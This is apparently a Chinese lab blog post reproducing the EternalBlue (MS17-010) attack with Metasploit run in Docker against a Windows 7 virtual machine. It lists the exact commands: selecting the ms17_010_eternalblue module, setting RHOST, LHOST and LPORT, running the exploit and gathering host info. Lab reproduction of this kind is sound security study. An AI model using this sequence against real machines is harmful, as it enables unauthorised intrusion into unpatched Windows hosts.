docker使用metasploit进行“永恒之蓝”复现

docker使用metasploit进行“永恒之蓝”复现

1.实验环境

  • win7虚拟机
  • Ubuntu虚拟机
  • 在Ubuntu上安装的docker
  • 在docker中安装的metasploit

2.实验过程

  • 进入root权限,查看docker镜像,查看metasploit的镜像id
使用命令
#sudo su
# docker images

在这里插入图片描述

  • 运行metasploit容器
# docker run -it -p 443:443 edbbfac76261

在这里插入图片描述

  • 搜索“永恒之蓝”漏洞的攻击有那些
    永恒之蓝的代号为“ms17_010"
search ms17_010

在这里插入图片描述

  • 选择第一种攻击方式
use exploit/windows/smb/ms17_010_eternalblue
show options

show options 可以看我们需要填那些参数,其中在require一栏,为yes的是必填的。
rhost:远程主机的IP地址
lhost:本机的IP地址
lport:本机的端口地址
在这里插入图片描述

  • 设置好各种需要的参数
    这里远程被攻击的主机为192.168.30.129
    特别注意
    docker里面的容器要和外界进行通信时需要进行端口映射的,容器使用docker的网络端口接收数据,在通过端口镜像来映射到容器当中的。所以在填写IP与端口是需要填写docker的IP,和docker与容器映射的端口,而不是容器的IP与容器的端口。
    在这里插入图片描述
  • 开始监听
exploit

在这里插入图片描述

  • 连接成功过后就可以通过命令行获取主机的信息了,这里就例举了一个例子
sysinfo   获取主机的信息

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

remandancy.h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值